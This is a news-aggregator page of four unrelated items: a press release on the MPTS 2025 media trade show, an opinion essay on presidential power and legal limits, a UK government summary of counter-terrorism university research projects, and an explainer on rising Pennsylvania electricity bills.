  • MIL-OSI Economics: MPTS 2025 celebrates largest edition ever with record visitor numbers, reveals MBI, a GlobalData company

    Source: GlobalData

    The UK’s most powerful hub for the creative industries united for two days of engaged networking, passionate debate and exceptional insights into AI, the creator economy, production craft and more – helping attendees stay ahead-of-the-curve for the year ahead.

    London, United Kingdom, 21 May 2025 – After two exceptional days of conversation, collaboration and community, the biggest and buzziest MPTS yet welcomed a record 13,000 attendees from 50 countries, uniting the UK’s media and entertainment industry in the heart of London like never before. The exhibition is organized by Media Business Insight (MBI) Ltd, a GlobalData company.

    Hosted at London’s Olympia on 14-15 May, the red-hot editorially driven program delivered 100+ free-to-attend sessions across eight theatres, showcasing the insight and passion of more than 350 expert speakers and guest keynotes. The bustling show floor was packed with more than 300 exhibitors and sponsors, showcasing imagination, determination and standout talent of the UK’s creative and technical communities – at a time of both global challenge and immense opportunity.

    Setting the agenda for MPTS, a State of the Nation Production keynote outlined a media and entertainment landscape in which storytellers had to embrace screens, formats and creators of all kinds.

    Kate Beal, CEO, Woodcut Media, asserted: “TV doesn’t exist anymore in the way we knew it.”

    Derren Lawford, CEO, Dare Pictures, said: “We are in the middle of a decade of profound transition, and we are past the tipping point. TV is part of a wider, connected series of industries around the creation and distribution and funding of content.”

    Headliners at MPTS included:

    • Producer and presenter Ross Kemp, who took us on an exhilarating tour of investigative documentaries on the front lines of conflict, drug cartels and organised crime gangs. “They will know in a second if you are not telling the truth,” he said. “I specialize in telling the truth, it is as simple as that.”
    • Georgie Holt, whose company Flight Story produces the world’s second biggest podcast ‘Diary of a CEO’, declared: “We are in the era of the Founder Creator — creators who are now in charge of media content and able to monetise spectacularly outside of traditional gatekeepers.”
    • NFL professional turned American Football broadcaster Jason Bell explained how sports coverage was evolving into the F1 Drive To Survive model, in which athlete personalities and back stories were the keys to growing audiences.
    • Blockbuster editor Eddie Hamilton gave a masterclass about the precision involved in making Top Gun: Maverick and five Mission: Impossible movies with Tom Cruise. He said: “Every nuance is refined hundreds of times. Sometimes we watch a 10-minute scene 40 times in a day, checking to see where your eye is moving in the frame.”

    Diverse representation is a vital sign of the industry’s health, and MPTS is proud to set the benchmark for equal representation and attendance from the next generation, not only across the program but also, as was clearly visible on the show floor, among exhibitors and attendees.

    MPTS also prioritizes the crucial importance of sustainability and, in continuing association with BAFTA albert, brought this conversation to the fore with experts including Peter Okell, Sky Studios Elstree; Luke Seraphin, Sky Studios; and Claire O’Neill, A Greener Future, speaking in the Sustainability Series.

    Sam Street, Marketing Officer, BAFTA Albert commented: “MPTS is a really key moment in our calendar. It is always so great to connect with suppliers, companies, studios and creatives who share our common passion for sustainability within screen industries. It has also been really valuable to curate our sustainability series of panels across this year’s show, we’ve had some really insightful discussions and emphasised the importance of environmental focus throughout the screen industries.”

    We did not need a machine to predict the high demand for news and information about AI. The brand-new ticketed AI Training program and the expanded AI Media Zone drew exceptional attendance, with exhibitors such as Dot Group, Moments Lab and Software. Conversations in these packed-out sessions revolved around the impact of AI from ideation to VFX, featuring real-world insights and discussions on bridging the gap between theory and practice from speakers including Pete Archer, BBC; Jon Roberts, ITN and Damien Viel, Banijay Entertainment.

    With a record number of exhibitors already rebooking for 2026, MPTS continues to prove its value as the UK’s number one event for media and production professionals, where brands, creatives and decision-makers come together to connect, collaborate and grow.

    Jane Shepard, Senior Channel Marketing Manager, Sandisk, said: “MPTS 2025 was a spectacular showcase of innovation, bringing together the brightest minds and cutting-edge technology in the industry. An unforgettable experience for all attendees.”

    Tom Rundle, Application Engineer, Yamaha Music, said: “It has been very busy for us. We have seen a huge mix of customers from the broadcast sector here, but also customers from the other industries which we serve, whether that’s live or theatre who have deliberately come to the show to seek us out to speak to us. Will we be back next year? Yes, absolutely, this is the first year for us, so it was always a bit of a toe in the water, but it’s been vastly more successful than we thought it was going to be.”

    Peter Alderson, Business Manager, Nikon, said: “This is our second year at MPTS, we’ve gone a little bit bigger on our stands, almost doubling it, and I think it’s definitely been worthwhile doing. We’ve partnered with RED, who we recently purchased, and MRMC so it’s making a lovely statement about where we are in the market, and I think we’re in the right place to make that statement here at MPTS.”

    Jennifer Hudson, Marketing Executive, Videndum, said: “This show is really important in our calendar – we attend nearly every year and find so much value in it. We get to meet with so many different professionals within the industry, and this year has been really, really positive for us. We’ve walked away with quite a few leads and made new relationships. It’s a fantastic show, and we would thoroughly recommend anyone thinking about coming and having a stand here to definitely do it – you won’t regret it.”

    Will Pitt, Head of Sales Solutions, Techex, said: “My impression of the show is that it’s been incredibly busy and very positive. Techex particularly specialise in solving some of the headaches that a lot of the broadcast industry is grappling with at the moment, namely, how they transition into an IP-led architecture from a legacy architecture and what that journey looks like. As such, our standards have been packed pretty much throughout the show to come and look at products, but also to come and talk about ideas and lean into what that journey looks like specifically for them. So not a generic journey, but specific to their drivers and their wants and needs in the short and medium term. We particularly like MPTS because it’s London based and many of the engineers that we speak to and collaborate with are based here and therefore it’s an easy journey for them to take half a day, a day out to come and investigate what we have to offer, but also to have those conversations. And so for organisations like WBD or Sky, the BBC, ITV, etc. They can come here quite easily and engage with us, spend some time talking in real life and not over teams or Zoom.”

    Charlotte Wheeler, Event Director, MPTS said: “Without doubt, 2025 was the most stimulating, ahead-of-the-curve MPTS yet. At a time when we are seeing the industry under real pressure from budget cuts to talent shortages and perpetual change, the conversations and connections on the show floor were positive and demonstrated infectious community spirit. The level of attendance and the quality of attendees from across all sectors of the industry was incredible – not just stakeholders in technology but representatives from production and commissioning, the creator economy, those new to the industry and freelancers were all brought together by MPTS under one roof.

    “A huge amount of work goes into making sure that there is equal representation across our extensive conference programme. I am proud that MPTS is one of – if not the – most diverse shows both in terms of attendees and panellists.

    “Thank you to everyone for exhibiting, sponsoring, speaking, attending and engaging with the show to make MPTS such a thrilling success. We are already planning for 2026, which marks MPTS’ 10th edition, so look forward to a landmark celebration!”

    Save the date for MPTS 2026 when we return to Olympia Grand Hall, London on 13 – 14 May 2026.

    The conversation does not stop when the doors close. MPTS is more than just two days a year – it is a connected, year-round community for the broadcast and media industry. From on-demand content to exclusive events, there’s still so much to explore. Stay connected with us: https://www.mediaproductionshow.com/register-interest

    To enquire about exhibiting at our landmark 10th edition, please go to: https://www.mediaproductionshow.com/stand-enquiry

    MBI is the publisher of market-leading titles including Broadcast, Broadcast Sport, Broadcast Tech, KFTV, The Knowledge and Screen International.


  • MIL-OSI Global: Trump treats laws as obstacles, not limits − and the only real check on his rule-breaking can come from political pressure

    Source: The Conversation – USA – By Andrew Reeves, Professor of Political Science and Director of the Weidenbaum Center, Washington University in St. Louis

    At his inauguration on Jan. 20, 2025, Donald Trump swore to ‘preserve, protect and defend the Constitution of the United States.’ Morry Gash/POOL/AFP, Getty Images

    Lately, the headlines have been clear: President Donald Trump is headed for a showdown with the courts. If he ignores their rulings, the courts have few tools and limited power to make him comply.

    But the real contest is not legal. It is political.

    As a political scientist who studies presidential behavior and public responses to unilateral action, I have spent my career examining the boundaries of executive power.

    Those limits, aimed at constraining the president, are set in law.

    The Constitution outlines the powers of Congress and the president in articles 1 and 2. It formally gives Congress the power of the purse and requires the president to “take Care that the Laws be faithfully executed.”

    Statutes dictate how agencies operate, how appointments are made and how funds must be spent. Courts interpret and enforce these rules.

    These legal constraints reflect the founders’ concern with unchecked executive power. That concern is embedded in the country’s political origins – the Declaration of Independence was a direct rebuke to royal overreach.

    But law alone has never been enough to prevent presidents from abusing their power. The law’s force depends on political will. Presidents often follow the law not simply because they must, but to avoid backlash from Congress, the media or the public.

    What the United States is witnessing in 2025 is not just a president testing the system. It is a transformation of the presidency into a fully political institution. The president acts until political resistance becomes strong enough to stop him.

    President Donald Trump criticizes judges whose decisions he doesn’t like.

    Testing the limits

    These political constraints are informal and fluid.

    They arise from public opinion, media scrutiny, pressure from party leaders and other elected officials, and the threat of electoral consequences. While legal rules rely on institutions, political limits depend on reputation, norms and the willingness of others to resist.

    Trump’s presidency operates within this second framework. Legal boundaries are still present, but they are often treated by his administration as optional and without deference.

    Trump, for example, has sidelined the Office of Legal Counsel, the executive branch’s source of legal guidance. His focus appears to be not on legality, process or constraint, but on headlines, polling and control of the narrative.

    Courts still issue rulings, but their power depends on a broader political culture of compliance, and that culture is weakening.

    Trump is not the first president to test the limits of authority. But the pace and scale of his defiance are without precedent. He appears to be betting that pushing boundaries will continue to pay off.

    Lag between law and action

    The legal challenges facing Trump are real.

    In his first 100 days back in office, he took aggressive steps on federal spending, appointments to key executive branch positions, tariffs and deportations. Trump has announced he will not enforce legislation that the Supreme Court confirmed was constitutional. Many of these actions have already triggered legal challenges.

    These are not isolated incidents. Taken together, they reveal a broader pattern.

    Trump appears to treat legal rules not as limits but as obstacles to be negotiated or ignored. One recent scholarly paper has described Trump’s approach as “legalistic noncompliance,” where the administration uses the language of law to give the appearance of compliance while defying the substance of court orders.

    The executive branch can move quickly. Courts cannot. This structural mismatch gives Trump a significant advantage. By the time a ruling is issued, the political context may have changed or public attention may have moved on.

    Judges have begun to notice. In recent weeks, courts have flagged not only legal violations but also clear signs of intentional defiance.

    Still, enforcement is slow, and Trump continues to behave as though court rulings are little more than political talking points.

    Politics the only real check

    Trump is not guided by precedent or legal tradition. If there is a limit on presidential power, it is political. And even that constraint is fragile.

    In a February 2025 national survey by the Weidenbaum Center, a research institute that I head at Washington University, just 21% of Americans said the president should be able to enact major policy without Congress. The public does not support unchecked presidential power: A further 25% of respondents, including more than one-third of Republicans, neither agreed nor disagreed that a president should have this type of unchecked power. Of those with an opinion, a solid 72% of Americans oppose unilateral presidential action, including 90% of Democrats, 76% of independents and 42% of Republicans.

    These findings align with nine earlier national surveys conducted during the Obama and Trump administrations. Jon Rogowski and I report these results in our book, “No Blank Check.”

    But one important shift stands out in the recent survey. Support for unilateral executive action among the two-thirds of Republicans who expressed an opinion has reached an all-time high, with 58% of them endorsing presidential action without Congress. That is more than 16 points higher than in any previous wave.

    Despite that rise in partisan support, Trump’s broader political position remains weak.

    His approval ratings remain underwater. His policies on tariffs and federal spending cuts are unpopular. Consumer confidence is falling.

    Congressional Republicans continue to offer public support, but many are watching their own polling numbers closely as the midterms approach.

    If the economy falters and public opinion turns more sharply against the president, political resistance could grow. I believe that’s when legal rules may begin to matter again – not because they carry new force, but because violating them would carry higher political costs.

    Real test still ahead

    So far, no judge has held the Trump administration in contempt of court. But the signs of erosion are unmistakable. Trump recently accused the Supreme Court of “not allowing me to do what I was elected to do” after it temporarily blocked his administration’s effort to deport migrants with alleged ties to Venezuelan gangs. Treating the judiciary as just another political adversary and ignoring its rulings risks an even deeper constitutional crisis.

    The most meaningful check on presidential power will be political.

    Courts rely on the broader political system for enforcement. That support can take many forms: elected officials speaking out in defense of the rule of law; Congress using its oversight and funding powers to uphold court rulings; bureaucrats refusing to implement unlawful directives; and a press and public that demand compliance. Without that support, even the clearest legal decisions may be ignored.

    The legal fights unfolding today are serious and must be watched closely. But Trump is not focused on the courts. He is focused on politics – on how far he can go, and whether anyone will make him stop.

    Andrew Reeves is affiliated with Washington University in St. Louis and the Hoover Institution.

    ref. Trump treats laws as obstacles, not limits − and the only real check on his rule-breaking can come from political pressure – https://theconversation.com/trump-treats-laws-as-obstacles-not-limits-and-the-only-real-check-on-his-rule-breaking-can-come-from-political-pressure-255834

    MIL OSI – Global Reports

  • MIL-OSI United Kingdom: Flies, crossbows and comics: novel counter terrorism innovation

    Source: United Kingdom – Executive Government & Departments

    Case study

    Flies, crossbows and comics: novel counter terrorism innovation

    Nine projects, ranging from whether flies can detect explosives to how comics can reduce radicalism and how much of a risk crossbows are, were showcased.

    More than 100 people attended the third University Innovation Concept event exploring ways in which cutting-edge research, often in unexpected areas, can help fight terrorism. 

    Nine fascinating and thought-provoking projects, ranging from whether flies can detect explosives (yes!) to how comics can reduce radicalism, and how much of a terrorism risk crossbows are, were on display at a showcase at the Open University in Milton Keynes, in which the Accelerated Capability Environment (ACE) was a proud partner. 

    Researchers and delegates were welcomed by Inspector Liam Cahill, Innovation Domain Lead at the Counter Terrorism Research Lab (CTRL), and Open University professors Arosha K Bandara and Eleanor Crabb. Annette Southgate, Head of ACE, then took to the stage to stress the importance of work and innovative collaboration such as this to “getting ahead of some of the people that are trying to cause us harm”. 

    Iain Harrison, Director of Digital, Data, Analysis & Technology at Counter Terrorism Policing, explained the rigorous process, supported by ACE, that began with 62 proposals from 28 different universities, which were then reviewed and whittled down to the nine stimulating ideas on display at the showcase event. 

    Bringing academia and Counter Terrorism Policing together 

    The projects that had been explored over 12 weeks of intensive research were showcased across three themes: 

    THEME ONE: Radicalisation and Interventions 

    First to present were a team from Anglia Ruskin University, on the topic of Exploring the Impact of Critical World Events on Extremist Misinformation Network (2020-24). This involved analysing 240 posts from four major platforms to understand how extremist groups exploit global crises on popular social media platforms, using hashtags and multiple forms of misinformation to amplify uncertainty and try to recruit new audiences. It also looked to pinpoint potential novel ways to intervene in this process.

    Next up were a team from Cranfield University, analysing how social media content algorithms respond to user interactions within specific topics, to answer the question of Can Social Media Algorithms Radicalise? This pilot was designed to quantify if user behaviours such as watching or liking videos influenced a popular platform’s algorithm, and to what extent. The conclusion was that the algorithm could be influenced to provide more content around a particular theme, but it is not yet clear how long this influence lasts. 

    The final presentation in this first session was from the University of Liverpool, exploring the topic of Graphic Novels to Enable Discussion and Promote Critical Thinking. This project involved creating a 46-page book containing four graphic novels on the topic of radicalisation, supported by front-line intervention practitioners, for use in educational strategies to encourage critical thinking. Comics were chosen because they are already popular worldwide, accessible and engaging as a format, and cheap to produce. 

    THEME TWO: Current Threats, Biosensors and Human Networks 

    After a break, another team from Cranfield University, which had been drawing big crowds in the breakout sessions for the four crossbows on display at their stand, spoke on their research into Crossbows: A Real and Current Threat. Against a background of the increasing use in targeted incidents of crossbows, which can legally be bought by anyone over the age of 18, this set out to examine the hit probability and wounding potential of four different systems, their reload times, and how these compared to current policing response times. The conclusion, drawn from a variety of tests including depth of penetration and discharge rate, was that crossbows need to be considered a real and present threat for a marauding terrorist attack, because all of those tested have the potential to cause significant injury, especially to unprotected organs.

    Next up was another project that had the audience buzzing – research from a team at The Open University on Fruit Fly Biosensors: Leveraging Olfactory Responses for Detection of Explosives and Toxic Chemicals. This explored if fruit flies, which have exceptional sensitivity, could be used as biosensors to detect toxins, drug precursors and explosives. The answer was potentially yes – experiments with TNT found that exposure to the explosive led to a gradual but clear increase in fly attraction, indicating that fruit flies can detect it. Preliminary lab data also suggests starving the flies may enhance TNT detection speed. 

    The final project in this session was an explanation of a Dynamic Target Indicator Tool (D-TinT) developed by a team at the University of Exeter. This uses techniques from movement pattern analytics and social network analysis to identify the best indicators of links between nodes in a human network based on movement patterns over time. This enables a statistical and spatial mathematical model to be developed. The Tool also identifies what might be flagged as a vulnerable target – either person or place – which could allow counter terrorism stakeholders to test the impact of possible risk-reduction procedures. 

    THEME THREE: Emerging Technologies 

    The final session of a highly enjoyable day started with a team from Robert Gordon University in Aberdeen talking the audience through their research on Leveraging Artificial Intelligence (AI) to Identify and Prevent Terrorism in Prisons: Legislative Gaps and Technological Solutions. This analysed AI’s role in situational awareness and radicalisation prevention, explored how it could support existing counterterrorism efforts, evaluated legal and ethical readiness for AI to be deployed in this way, and proposed technical and legal reforms to enable the responsible use of AI technologies in prison settings. The conclusion of the research was that AI offers significant potential to enhance security and counter-radicalisation efforts in UK prisons. 

    Next, a scoping study of Augmented Reality and Terrorism was presented by Dr Richard Jones of Edinburgh Law School, part of the University of Edinburgh. Billing augmented reality as a “technology in search of a purpose”, his research explored both potential law enforcement applications, such as head-up real-time navigation and facial recognition of persons of interest, as well as how terrorists could use the same technology, for example to create video footage for propaganda purposes. It also looked at how this technology could evolve in the public domain. The research concluded that feasibility factors include device cost and availability as well as the level of required technological expertise, which is likely to fall, in addition to utility and whether it solves a problem. 

    The final presentation of the day was by a team from the University of Southampton on Exploiting Vulnerabilities in Autonomous Vehicle Systems for Terrorist Activity – Threats to UK Critical National Infrastructure. This focused on identifying vulnerabilities in autonomous vehicle systems amid increasing reliance on connected and automated vehicles, analysing how terrorists could exploit these to disrupt or control them, for example by hijacking the vehicle controls or causing collisions by manipulating road signs. The conclusion was that proactive risk mitigation is paramount.

    Following the event, Inspector Cahill said: “The University Innovation Concept (UIC) was conceived with the intention of bringing Counter Terrorism Policing and academia closer together to ensure operational decisions made by experienced and knowledgeable personnel are backed by science and academic rigour. 

    “The one-day showcase was also a fantastic opportunity for attendees to network, learn about ongoing research and potentially take learning back to their operational roles, and feedback has been extremely positive.”  

    Reflecting on the event, Professor Southgate said: “ACE is proud to support policing colleagues find new and creative ways of solving frontline mission problems through partnership with researchers from across a diversity of backgrounds and institutions.

    “Accessing diversity of thought, approach and experience helps us step back and consider more impactful and enduring ways of tackling existing and sometimes long-standing problems. 

    “We are keen to help identify and shine a light on brilliant academic work that can already help solve today’s mission problems; highlighting the difference this makes, help build relationships and continue encouraging our talented academic community to support frontline policing work.”

    Published 21 May 2025

    MIL OSI United Kingdom

  • MIL-OSI Global: Why your electricity bill is so high and what Pennsylvania is doing about it

    Source: The Conversation – USA – By Hannah Wiseman, Professor of Law, Penn State

    Pennsylvanians can expect 10% to 20% increases in their electricity bills over the next three years. Gregory Rodriguez/iStock via Getty Images

    Americans’ electricity bills tend to tick up each year in line with inflation.

    But upgrades to electric wires, reinforcing and protecting power lines from severe weather, and changing fuel costs – among other factors – are sending rates soaring.

    High electricity consumption from data centers and other sources of rising demand will likely cause further increases in the near future.

    The impact on consumers is particularly dramatic in Pennsylvania, where rate hikes are widespread.

    For example, the monthly bill for a PECO residential customer who uses 700 kilowatt hours of electricity monthly increased 10% – or US$13.58 – in 2025. These bills will go up another $2.70 each month in 2026.

    Retail price adjustments approved by the Pennsylvania Public Utility Commission for most electric distribution utilities, effective December 2024, led to higher bills for many customers across the state. In some parts of Pennsylvania, the estimated increases topped 30%.

    As professors who work in the areas of energy law and electricity markets, we know electricity costs are rising in many parts of the U.S.

    But Pennsylvania faces distinct challenges related to its electric grid – the maze of wires and generators – that drive both the growing demand for electricity and the limited supply.

    PJM and the electric grid

    Pennsylvania power plants produce a lot of electricity. In fact, the Keystone State is the largest exporter of electricity in the U.S. and has been for many years.

    But the electricity Pennsylvania produces doesn’t always stay in state.

    That’s because Pennsylvania’s electric grid is managed by a company called PJM. PJM coordinates the flow of electricity through all or parts of 13 states and the District of Columbia, and it ensures the wholesale electricity transmission system operates reliably and safely.

    Pennsylvania electric utilities, such as PECO or Duquesne Light, then distribute this wholesale electricity to retail customers, including homeowners and renters.

    PJM requires the utilities to ensure ahead of time that they can meet their customers’ future electricity demands, including during heat waves and winter storms. This requirement is met using a market called a “capacity auction,” in which electricity suppliers bid to provide physical infrastructure that will generate electricity in the future.

    The prices at the 2025-2026 PJM capacity auction were more than 800% higher than the previous year, in part due to the growing demand for electricity within PJM. This amounts to tens of billions of dollars in extra costs.

    Power plants in Pennsylvania can’t simply stop exporting electricity and supply more in-state power because they dispatch their power into the regional grid operated by PJM, and the flow of electricity is dictated by the physical structure of this grid.

    Pennsylvania shares an electric grid with northern Virginia, considered the largest data center market in the world.
    Nathan Howard via Getty Images

    Soaring demand from data centers

    U.S. electricity demand rose 3% in 2024 and is expected to rise even more rapidly in the coming years.

    Much of this new demand comes from data centers, which support everything from AI applications and data storage – think of the thousands of emails and files backed up on our computers – to sports betting, online retailers such as Amazon, and national security applications such as the North American Aerospace Defense Command.

    Pennsylvania is on the same electric grid as Virginia, which hosts about a quarter of all data center capacity in the Americas. New data centers are also being built in Pennsylvania.

    Rising demand is also driven by the increase in electric vehicles and the replacement of gas- and oil-based furnaces with electric heat pumps. These replacements are ultimately more energy efficient but require electricity.

    Bottlenecks in supply

    The increase in electricity demand within PJM is happening at the same time that supply is shrinking.

    Many old generating plants in the PJM grid are retiring as they near the end of their useful lives and become less profitable for plant operators, particularly as natural gas and solar become more affordable. Some of these older power plants also emit a lot of pollution and are costly to retrofit to meet current pollution limits.

    Beyond the challenge of plant retirements, PJM has been slow to allow hundreds of new proposed power plants – most of them solar- and battery-based – to connect to transmission lines.

    This long “interconnection queue” prevents new, needed generation from coming online. This is happening even though companies are eager and ready to build more generation and battery storage.

    Aging infrastructure and growing weather extremes

    One of the primary recent drivers of high consumer electric bills is that the utilities have been slow to upgrade their aging wires.

    Many have recently made major investments in new infrastructure and in some cases are burying or strengthening wires to protect them from increasingly extreme weather.

    Electricity customers are footing the bill for this work.

    Increasing demand, aging power infrastructure and transmission bottlenecks lead to higher electricity rates.
    David Espejo/Moment Collection via Getty Images

    Response from policymakers

    In response to rising electricity prices, Pennsylvania Gov. Josh Shapiro filed a legal complaint with the Federal Energy Regulatory Commission against PJM in December 2024. This complaint blamed PJM’s capacity auction design for creating unnecessary costs for consumers.

    According to the settlement reached after the complaint, PJM’s price caps will be 35% lower at the next major capacity auction. This reduction in wholesale prices could limit retail price increases.

    But this is at best a temporary fix. It doesn’t address the increasing demand, aging power infrastructure battered by extreme weather, or transmission bottleneck.

    In order for Pennsylvania residents to see lower electric bills anytime soon, more changes are needed. For example, many experts previously observed that PJM needs to fix the queue and bring online the many power plants that are ready to build and just waiting for a transmission interconnection.

    While PJM has reformed its queue process, the queue is still long. New power plants are not going up fast enough, in part due to additional challenges such as local opposition and supply chain and financing issues.


    Hannah Wiseman receives or has recently received funding from the Alfred P. Sloan Foundation, Arnold Ventures, U.S. National Science Foundation, U.S. Department of Energy, Center for Rural Pennsylvania, and the Pennsylvania Department of Environmental Protection. She is a member of the Center for Progressive Reform.

    Seth Blumsack receives or has recently received funding from the Alfred P. Sloan Foundation, Heising Simons Foundation, U.S. National Science Foundation, U.S. Department of Energy, NASA, U.S. Federal Aviation Administration, Center for Rural Pennsylvania and the Pennsylvania Department of Environmental Protection.

    ref. Why your electricity bill is so high and what Pennsylvania is doing about it – https://theconversation.com/why-your-electricity-bill-is-so-high-and-what-pennsylvania-is-doing-about-it-254562
